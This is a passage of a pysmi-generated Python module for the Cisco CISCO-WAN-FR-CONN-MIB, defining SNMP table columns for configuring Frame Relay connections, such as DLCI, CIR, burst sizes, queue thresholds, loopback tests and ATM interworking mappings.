# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-WAN-FR-CONN-MIB
# Produced by pysmi-0.3.4 at Wed May 1 12:20:25 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueRangeConstraint, ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueRangeConstraint", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint")
frameRelay, frChan = mibBuilder.importSymbols("BASIS-MIB", "frameRelay", "frChan")
ciscoWan, = mibBuilder.importSymbols("CISCOWAN-SMI", "ciscoWan")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, IpAddress, iso, TimeTicks, ModuleIdentity, Counter64, ObjectIdentity, Unsigned32, MibIdentifier, Integer32, NotificationType, Counter32 = mibBuilder.importSymbols("SNMPv2-SMI", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "IpAddress", "iso", "TimeTicks", "ModuleIdentity", "Counter64", "ObjectIdentity", "Unsigned32", "MibIdentifier", "Integer32", "NotificationType", "Counter32")
TruthValue, TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TruthValue", "TextualConvention", "DisplayString")
ciscoWanFrConnMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 351, 150, 47))
ciscoWanFrConnMIB.setRevisions(('2002-09-18 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ciscoWanFrConnMIB.setRevisionsDescriptions(('Initial version of the MIB. The content of this MIB was originally available in CISCO-WAN-AXIPOP-MIB defined using SMIv1. The applicable objects from CISCO-WAN-AXIPOP-MIB are defined using SMIv2 in this MIB. Also the descriptions of some of the objects have been modified.',))
if mibBuilder.loadTexts: ciscoWanFrConnMIB.setLastUpdated('200209180000Z')
if mibBuilder.loadTexts: ciscoWanFrConnMIB.setOrganization('Cisco Systems, Inc.')
if mibBuilder.loadTexts: ciscoWanFrConnMIB.setContactInfo(' Cisco Systems Customer Service Postal: 170 W Tasman Drive San Jose, CA 95134 USA Tel: +1 800 553-NETS E-mail: [email protected]')
if mibBuilder.loadTexts: ciscoWanFrConnMIB.setDescription("The MIB module to configure the Frame Relay connection configuration. Terminologies Used: SIW - Frame-Relay-to ATM Service Interworking. In SIW, the ATM port connected to a frame relay port does not need to be aware that it is connected to an interworking function. This is explained in document FRF.8. NIW - Frame-Relay-to ATM Network Interworking. In NIW, the ATM port connected to a frame relay port does need to be aware that it is connected to an interworking function. PVC - Permanent Virtual Circuit OR Permanent Virtual Connection A frame relay logical link, whose endpoints and class of service are defined by network management. A PVC consists of the originating frame relay network element address, originating DLCI, terminating frame relay network element address and terminating DLCI. This is controlled by PAR(Portable Auto Route) controller. SPVC - Soft Permanent Virtual Circuits. This is a PVC controlled by PNNI Controller. Frame Relay PVC/SPVC end-point/Channel is referred to as frame Relay connection in this MIB. Traffic shaping parameters: CIR, EIR, Bc, Be, DE, Tc, AR corresponding to rate of the physical interface. CIR - Committed Information Rate. This is the rate of traffic that the PVC will support as 'comitted' traffic. The committed rate(in bits per second) at which the ingress access interface trunk interfaces, and egress access interface of a frame relay network transfer information to the destination frame relay end system under normal conditions. The rate is averaged over a minimum time interval Tc. AR - Access Rate The maximum number of bits per second that an end station can transmit into the network is bounded by the acess rate of the user-network interface. The line speed of the user network connection limits the access rate. Bc - Committed Burst Size The maximum amount of data(in bits) that the network agrees to transfer, under normal conditions during a time interval Tc. The data is in bytes in the current implementation. Be - Excess Burst Size The maximum amount of uncommitted data(in bits) in excess of BC that a frame relay network can attempt to deliver during a time interval Tc. This data generally is delivered with a low probability than Bc. The network treats Be data as discard eligible. The data is in bytes in the current implementation. Tc - The committed rate measurement interval. The time interval during which the user can send only BC committed amount of data and BE excess amount of data. EIR - Excess Information Rate This is the bandwidth in excess of CIR the PVC will be allowed to burst on a a given PVC. The average rate at which excess traffic is to be policed. This number is computed based on Bc, Be, CIR and Tc. DE - Discard Eligibility Frame Forwarding Port: Frame Forwarding Ports are identified by portType = frame-forward(3). NOTE: The objects related to frame relay ports are available in ifTable,if ifTable is implemented in service module/card. Following Service Modules support ifTable: FRSM-12 ")
frChanCnfGrp = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1))
frChanCnfGrpTable = MibTable((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1), )
if mibBuilder.loadTexts: frChanCnfGrpTable.setStatus('current')
if mibBuilder.loadTexts: frChanCnfGrpTable.setDescription('This table is for configuring connection parameters for frame relay connections.')
frChanCnfGrpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1), ).setIndexNames((0, "CISCO-WAN-FR-CONN-MIB", "chanNum"))
if mibBuilder.loadTexts: frChanCnfGrpEntry.setStatus('current')
if mibBuilder.loadTexts: frChanCnfGrpEntry.setDescription('An entry for each frame relay connection.')
chanNum = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chanNum.setStatus('current')
if mibBuilder.loadTexts: chanNum.setDescription('The value of this object identifies the frame relay connection/channel index. Note that the actual range of the index supported by a card depends on the type of card. Supported Range for different Card Types: FRSM-4T1/E1 : Range is 16..271 (256 entries) FRSM-8T1/E1 : Range is 16..1015 (1000 entries) FRSM-T3/E3/HS2/ /HS2B-HSSI/T3B/E3B : Range is 16..2015 (2000 entries) FRSM-2CT3/HS2B-12IN1: Range is 16..4015 (4000 entries) For FRSM12 Card : Range is 16..16015 for Lower 16 bits Upper 16 bits contain Chassis Number and logical slot number.')
chanRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("add", 1), ("del", 2), ("mod", 3), ("outOfService", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanRowStatus.setStatus('current')
if mibBuilder.loadTexts: chanRowStatus.setDescription('This object is used for adding/modifying/deleting the channel. add(1) : For adding the frame relay connections. delete(2): For deleting frame relay connections. mod(3) : For Modifying frame relay connections. This is also used for uping the connection. outOfService(4) : Bring the Frame relay connection down.')
chanPortNum = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 3), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanPortNum.setStatus('current')
if mibBuilder.loadTexts: chanPortNum.setDescription("This object refers to the frame relay port on which channel is created. This is a mandatory object for creating the channel. For FRSM12 Card: This object contains the port's ifIndex value. ")
dLCI = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 8388607))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: dLCI.setStatus('current')
if mibBuilder.loadTexts: dLCI.setDescription("The value of this object is the DLCI number of the channel. This is a mandatory object for creating the channel. All the connections on the same port should have a unique DLCI number. Note that if we are adding a channel to a port that has LMI signalling enabled, then we can not use DLCI number 0(ANNEX A & D) and 1023(STRATA LMI). The value of this object can be only 1000 if the portType = frame-forward(3) on which the frame relay connection is being created. That is, only one Frame Relay Connection can be created on a Frame Forwarding Port. For portHeaderLen = twoOctets(1) following restrictions apply. Range supported is '0..1023' DLCI values 0,1007, 1023 can not be used. For portHeaderLen = fourOctets(2) following restrictions apply. Range supported is '0..8388607' DLCI values 0,8257535 can not be used. ")
egressQSelect = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("highPriority", 1), ("lowPriority", 2), ("notSupported", 3))).clone('lowPriority')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: egressQSelect.setStatus('current')
if mibBuilder.loadTexts: egressQSelect.setDescription('Selects one out of two possible port queues. The default port queue number is 1 which is the high pririty queue. 1 = High priority queue 2 = Low priority queue 3 = Indicates that this entry is not used (eg: in FRSM-VHS, chanServType indicates the channel service type and would determine the queue to which the channel gets mapped) For FRSM12 Card: This object is used to select between the two ATM-COS queues in the egress direction. ')
ingressQDepth = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(4510, 2097151)).clone(65535)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ingressQDepth.setStatus('current')
if mibBuilder.loadTexts: ingressQDepth.setDescription("This variable sets the max depth for queue, before it starts dropping the cells. It is defined in terms of number of bytes. In all cards except the FRSM-VHS card, the range is limited to (4510..'ffff'h). ingressQDepth should be greater than ingressQECNThresh and ingressQDEThresh For FRSM12 Card: Not Supported ")
ingressQECNThresh = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2097151)).clone(6553)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ingressQECNThresh.setStatus('current')
if mibBuilder.loadTexts: ingressQECNThresh.setDescription("This variable sets the max depth for queue, before it starts flow control. It is defined in terms of number of bytes. In all cards except the FRSM-VHS card, the range is limited to (0..'ffff'h). For FRSM12 Card: Not Supported ")
ingressQDEThresh = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2097151)).clone(32767)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ingressQDEThresh.setStatus('current')
if mibBuilder.loadTexts: ingressQDEThresh.setDescription("This variable sets the max depth for queue, before they become discard eligible. It is defined in terms of number of bytes. In all cards except the FRSM-VHS card, the range is limited to (0..'ffff'h). For FRSM12 Card: Not Supported ")
egressQDepth = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2097151)).clone(65535)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: egressQDepth.setStatus('current')
if mibBuilder.loadTexts: egressQDepth.setDescription("This variable sets the max depth for queue, before it starts dropping the cells. It is defined in terms of number of bytes. In all cards except the FRSM-VHS card, the range is limited to (0..'ffff'h). egressQDepth should be greater than egressQDEThresh and egressQECNThresh For FRSM12 Card: Not Supported ")
egressQDEThresh = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2097151)).clone(32767)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: egressQDEThresh.setStatus('current')
if mibBuilder.loadTexts: egressQDEThresh.setDescription("This variable sets the max depth for queue, before they become discard eligible. It is defined in terms of number of bytes. In all cards except the FRSM-VHS card, the range is limited to (0..'ffff'h). For FRSM12 Card: Not Supported ")
egressQECNThresh = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2097151)).clone(6553)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: egressQECNThresh.setStatus('current')
if mibBuilder.loadTexts: egressQECNThresh.setDescription("This variable sets the max depth for queue, before it starts flow control. It is defined in terms of number of bytes. In all cards except the FRSM-VHS card, the range is limited to (0..'ffff'h). For FRSM12 Card: Not Supported ")
deTaggingEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: deTaggingEnable.setStatus('current')
if mibBuilder.loadTexts: deTaggingEnable.setDescription('This object enables/disables the DE tagging. The tagging is enabled only in the ingress direction. For FRSM12 Card: When this object is disabled, the ingress policer will never set the DE bit to 1 in the Frame Relay frames even if the incoming frame exceeds the Bc bucket. ')
cir = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 52000000)).clone(2400)).setUnits('bps').setMaxAccess("readwrite")
if mibBuilder.loadTexts: cir.setStatus('current')
if mibBuilder.loadTexts: cir.setDescription('The value of this object is equal to the CIR parameter for this frame relay connection. The CIR value have to be less than or equal to the port speed. Any value from 1 to 2399 will be rounded off to 2400. Range supported for different interfaces/card: For E1 interface : Range is 0..2048000 For T1 interface : Range is 0..1536000 For E3 interface : Range is 0..34368000 For T3 interface : Range is 0..44736000 For HSSI : Range is 0..52000000 For FRSM-2CT3 : Range is 0..1536000 For FRSM-HS2B-12IN1: Range is 0..10240000 The CIR value can be 0 only for chanServType = uBR(5). ')
bc = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 14), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2097151)).clone(5100)).setUnits('bytes').setMaxAccess("readwrite")
if mibBuilder.loadTexts: bc.setStatus('current')
if mibBuilder.loadTexts: bc.setDescription('The value of this object is equal to the committed burst size(BC) parameter for this PVC endpoint. The value of bc can not be 0 when cir is non zero. The value of bc has to be 0 if cir is 0. The peak value for bc in FRSM-VHS cards is (2^21 -1), i.e. 2097151 and for all other cards, it is 65535. For FRSM-VHS cards, the relation between CIR and Bc should be such that Tc is always less than 512 seconds. ')
be = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 15), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2097151)).clone(5100)).setUnits('bytes').setMaxAccess("readwrite")
if mibBuilder.loadTexts: be.setStatus('current')
if mibBuilder.loadTexts: be.setDescription('The value of this object is euqal to the excess burst size(Be) parameter for this PVC endpoint. The value be can not be 0 when cir is 0. The peak value for be : For FRSM-VHS and FRSM12 cards is (2^21 -1), i.e. 2097151 and For all other cards, it is 65535. For FRSM-VHS cards, setting the value of 2091751 will cause the policing to be disabled. ')
ibs = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 16), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2097151)).clone(100)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ibs.setStatus('current')
if mibBuilder.loadTexts: ibs.setDescription('The value of this object is euqal to the excess burst size(Be) parameter for this PVC endpoint. The value of ibs should be less or equal to bc when cir is greater than 0. The value of ibs has to be 0 when cir is 0. The peak value for ibs in FRSM-VHS cards is (2^21 -1), i.e. 2097151 and for all other cards, it is 65535. For FRSM12 Card: Not Supported ')
foreSightEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 17), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: foreSightEnable.setStatus('current')
if mibBuilder.loadTexts: foreSightEnable.setDescription('This variable enables/disables foreSight option. Following objects can be modified only when this object is set to enable(1): qir, mir, pir The RATE CONTROL FEATURE has to be ON in order to enable foresight and also modify its parameter. For FRSM12 Card: Not Supported ')
qir = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 18), Integer32().subtype(subtypeSpec=ValueRangeConstraint(160, 6400000)).clone(160)).setUnits('fastpackets-per-second').setMaxAccess("readwrite")
if mibBuilder.loadTexts: qir.setStatus('current')
if mibBuilder.loadTexts: qir.setDescription('The value of this object is euqal to the quiescent information rate for Foresight. The unit is 1 Cell/Sec = 16 fastpackets/sec. Following information about cps is for reference only: The peak value for qir in FRSM-VHS cards is 285714 cps and for all other cards, it is 10000 cps. For FRSM-VHS cards, cell will be the ATM cell (48 byte payload). For FRSM12 Card: Not Supported')
mir = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 19), Integer32().subtype(subtypeSpec=ValueRangeConstraint(160, 6400000)).clone(160)).setUnits('fastpackets-per-second').setMaxAccess("readwrite")
if mibBuilder.loadTexts: mir.setStatus('current')
if mibBuilder.loadTexts: mir.setDescription('The value of this object is euqal to the minimum information rate for Foresight. The unit is 1 Cell/Sec = 16 fastpackets/sec. is equal to 16 fastpackets/sec. Following information about cps is for reference only: The peak value for qir in FRSM-VHS cards is 285714 cps and for all other cards, it is 10000 cps. For FRSM-VHS cards, cell will be the ATM cell (48 byte payload). For FRSM12 Card: Not Supported ')
pir = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 20), Integer32().subtype(subtypeSpec=ValueRangeConstraint(160, 6400000)).clone(160)).setUnits('fastpackets-per-second').setMaxAccess("readwrite")
if mibBuilder.loadTexts: pir.setStatus('current')
if mibBuilder.loadTexts: pir.setDescription('The value of this object is euqal to the peak information rate for Foresight. The unit is 1 Cell/Sec = 16 fastpackets/sec. is equal to 16 fastpackets/sec. Following information about cps is for reference only: The peak value for qir in FRSM-VHS cards is 285714 cps and for all other cards, it is 10000 cps. For FRSM-VHS cards, cell will be the ATM cell (48 byte payload). For FRSM12 Card: Not Supported ')
chanLocRmtLpbkState = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 21), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanLocRmtLpbkState.setStatus('current')
if mibBuilder.loadTexts: chanLocRmtLpbkState.setDescription('This variable enables or disables the remote loopback for each channel. When you enable this option on a connection (channel) then all the cells that are coming from the network side would be looped back toward the network and all the frames coming from the user side would be dropped. This channel remote loopback has nothing to do with the chanTestType option, each one does a different function. For example, the channel remote loopback is used for looping the data toward the network and if this connection is terminated on an IPX then they can put a test equipment and measure some of the characteristics of the network. For FRSM12 Card: Not Supported ')
chanTestType = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 22), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("testcon", 1), ("testdelay", 2), ("notest", 3))).clone('notest')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanTestType.setStatus('current')
if mibBuilder.loadTexts: chanTestType.setDescription('The chanTestType starts testing the continuity or delay of a connection. It sends specific cell patterns toward the network and the terminating end of this connection has to be an MGX8220 or ASI of a BPX in order for this test to be working. The receiving node would loop back when it receives these cells. The test should be done in about couple of seconds. The testcon tests the continuity of the connection and testdelay uses the same test except that it measures for delay through the network. To test the delay follow this procedure: a- set chanTestType to testdelay b- read chanTestState till it is Pass or Fail c- Read chanRTDResult for the delay if it is Pass *Note that the chanTestType would go back to notest when the test is completed To test the continuity follow this procedure: a- set chanTestType to testcon b- read chanTestState till it is Pass or Fail *Note that the chanTestType would go back to notest when the test is completed You CAN NOT select 2 tests back to back, you have to select one and wait for the result and then start the other one. SYNTAX When you select testdelay This is the type of the test 1 = Test Continuity 2 = Test Delay 3 = No Test ')
chanTestState = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 23), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("passed", 1), ("failed", 2), ("inprogress", 3), ("notinprogress", 4))).clone('notinprogress')).setMaxAccess("readonly")
if mibBuilder.loadTexts: chanTestState.setStatus('current')
if mibBuilder.loadTexts: chanTestState.setDescription('This shows the state of the test When you add a connection then the chanTestState becomes notinprogress and when you select any test, it would go to inprogress state and after it completes the test, it will go to failed or passed state. 1 = Passed 2 = Failed 3 = In Progress 4 = Not In Progress ')
chanRTDResult = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 24), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535)).clone(65535)).setMaxAccess("readonly")
if mibBuilder.loadTexts: chanRTDResult.setStatus('current')
if mibBuilder.loadTexts: chanRTDResult.setDescription('This is round trip delay in milliseconds. When you select testdelay option for the chanTestType, the result of the test that is measured in milliseconds can be read in chanRTDResult. ')
chanType = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 25), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("frNIW", 1), ("frSIW-transparent", 2), ("frSIW-translate", 3), ("frFUNI", 4), ("frForward", 5), ("frNIWReplace", 6)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanType.setReference('FRF.8')
if mibBuilder.loadTexts: chanType.setStatus('current')
if mibBuilder.loadTexts: chanType.setDescription("The value of this object is used for setting the channel type of a frame relay connection. If set with values frSIW-transparent(2) and frSIW-translate(3), all PVC data is subject to service interworking translation and mapping in both Frame Relay-to-ATM and ATM-to-Frame relay directions. The possible values are : frNIW(1) : Frame-Relay-to ATM Network Interworking(NIW-unicast). The traffic crosses the network as ATM Cells. frSIW-transparent(2): Service InterWorking with out any SDU translation. In transparent mode, the service module does not translate. frSIW-translate(3) : Service InterWorking with SDU translation. In translation mode, service module translates protocol between the FR NLPID encapsulation(RFC 1490) and ATM LCC encapsulation(RFC 1483). Translation mode support includes address resolution by transforming address resolution protocol (ARP, RFC 826) and inverse ARP(RFC 1293) between the frame relay and ATM Formats. frFUNI(4) : Frame based UNI: mode-1a which is ALL5. frForward(5) : frame forwarding. Frame forwarding operates same as standard frame relay except: * 2 byte Q.922 header is not assumed or interpreted. * All frames received are mapped to a specific connection if it exists. Otherwise the frames are dropped. * No DE/CLP or FECN/EFCI mapping is performed. * 'llegal Header count' and 'invalid DLCI' statistics are not kept/applicable. frNIWReplace(6) : Frame Relay network interworking with DLCI in FR-SSCS(Frame Relay Specific Convergence Sublayer)PDU always set to 1022. ")
chanFECNconfig = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 26), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("mapEFCI", 1), ("setEFCIzero", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanFECNconfig.setReference('FRF.8, section 4.3.1.1')
if mibBuilder.loadTexts: chanFECNconfig.setStatus('current')
if mibBuilder.loadTexts: chanFECNconfig.setDescription('The value of this object specifies how to map from FECN field in the frame Relay PDU to the EFCI field in the ATM cells. This object does not apply to NIW. This is applicable only for SIW. mapEFCI(1) : Maps the FECN bits in frame-relay to EFCI bit in the ATM cells. This value is valid only for SIW. setEFCIzero(2): Set EFCI = 0. Do not map FECN to EFCI.')
chanDEtoCLPmap = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 27), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("mapCLP", 1), ("setCLPzero", 2), ("setCLPone", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanDEtoCLPmap.setReference('FRF.5, FRF.8')
if mibBuilder.loadTexts: chanDEtoCLPmap.setStatus('current')
if mibBuilder.loadTexts: chanDEtoCLPmap.setDescription('The value of this object specifies how to map from DE bit on the Frame Relay side to CLP bit on the ATM side. mapCLP(1) : Map DE bit to CLP bit in ATM cell. setCLPzero(2) : Ignore DE bit. Set CLP to 0. setCLPone(3) : Ignore DE bit. Set CLP to 1. For FRSM12 Card: Should not be mapCLP for chanType of frForward. ')
chanCLPtoDEmap = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 28), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("mapDE", 1), ("setDEzero", 2), ("setDEone", 3), ("ignoreCLP", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanCLPtoDEmap.setReference('FRF.8, section 4.2.2 FRF.5, section 4.4.2')
if mibBuilder.loadTexts: chanCLPtoDEmap.setStatus('current')
if mibBuilder.loadTexts: chanCLPtoDEmap.setDescription('The value of this object enables mapping of Cell Loss Priority(CLP) bit on the ATM Side to Discard Eligibility(DE) bit on the Frame relay side. The possible values are : mapDE(1) : Map CLP bit to DE bit. Valid for SIW and NIW. setDEzero(2) : Ignore CLP. Set DE bit to 0. Valid for SIW. setDEone(3) : Ignore CLP. Set DE bit to 1. Valid for SIW. ignoreCLP(4) : Ignore CLP. No change in receieved DE bit. Valid for NIW. For FRSM12 Card: Should be ignoreCLP for chanType of frForward. Should not be setDEzero/setDEone for chanType of frNIW and frNIWReplace. Should not be ignoreCLP for chanType of frSIW-transparent and frSIW-translate. ')
chanIngrPercentUtil = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 29), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 100)).clone(100)).setUnits('percentage').setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanIngrPercentUtil.setStatus('current')
if mibBuilder.loadTexts: chanIngrPercentUtil.setDescription('The ingress utilization on a frame relay connection.')
chanEgrPercentUtil = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 30), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 100)).clone(100)).setUnits('percentage').setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanEgrPercentUtil.setStatus('current')
if mibBuilder.loadTexts: chanEgrPercentUtil.setDescription('The egress utilization on a frame relay connection.')
chanEgrSrvRate = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 31), Integer32().subtype(subtypeSpec=ValueRangeConstraint(2400, 52000000)).clone(2400)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanEgrSrvRate.setStatus('current')
if mibBuilder.loadTexts: chanEgrSrvRate.setDescription('The value of this object identifies egress CIR value for a frame relay connection. The value of this object must be less than or equal(<=) to the port speed. The value supported depends upon the interface and service module(card) type. For E1 Service Module : Range is 2400..2048000 For T1 Service Module : Range is 2400..1536000 2CT3 Module : For E3 Service Module : Range is 2400..34368000 For T3 Service Module : Range is 2400..44736000 For HSSI Service Module : Range is 2400..52000000 For FRSM12 Card: This object is used only for CAC and the range will be same as the range for cir object. The Maximum value is 44736000m. ')
chanOvrSubOvrRide = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 32), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("disable", 1), ("enable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanOvrSubOvrRide.setStatus('current')
if mibBuilder.loadTexts: chanOvrSubOvrRide.setDescription('The value of this object enables/disables the oversubscription on a connection. This object allows one to add a new connection on a port even if it is over subscribed. For FRSM12 Card: Not Supported.')
chanFrConnType = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 33), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("pvc", 1), ("svc", 2), ("spvc", 3), ("par", 4), ("pnni", 5), ("tag", 6))).clone('pvc')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanFrConnType.setStatus('current')
if mibBuilder.loadTexts: chanFrConnType.setDescription('The value of this object is used for configuring connection type of a frame relay connection. The possible values are : pvc(1) : Permanent Virtual Connection svc(2) : Switched Virtual Connection spvc(3) : Soft PVC. par(4) : Portable Auto Route Connection. Valid only for trunk connection pnni(5) : PNNI Connection Valid only for trunk connection tag(6) : Tag/MPLS Connection Valid only for trunk connection For FRSM12 Card: Not Supported.')
frCDRNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 34), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frCDRNumber.setStatus('current')
if mibBuilder.loadTexts: frCDRNumber.setDescription('The value of this object identifies the CDR(Call Detail Record) number. This is the key to correlate cell/frame counts, start/end record. For FRSM12 Card: Not Supported ')
frLocalVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 35), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: frLocalVpi.setStatus('current')
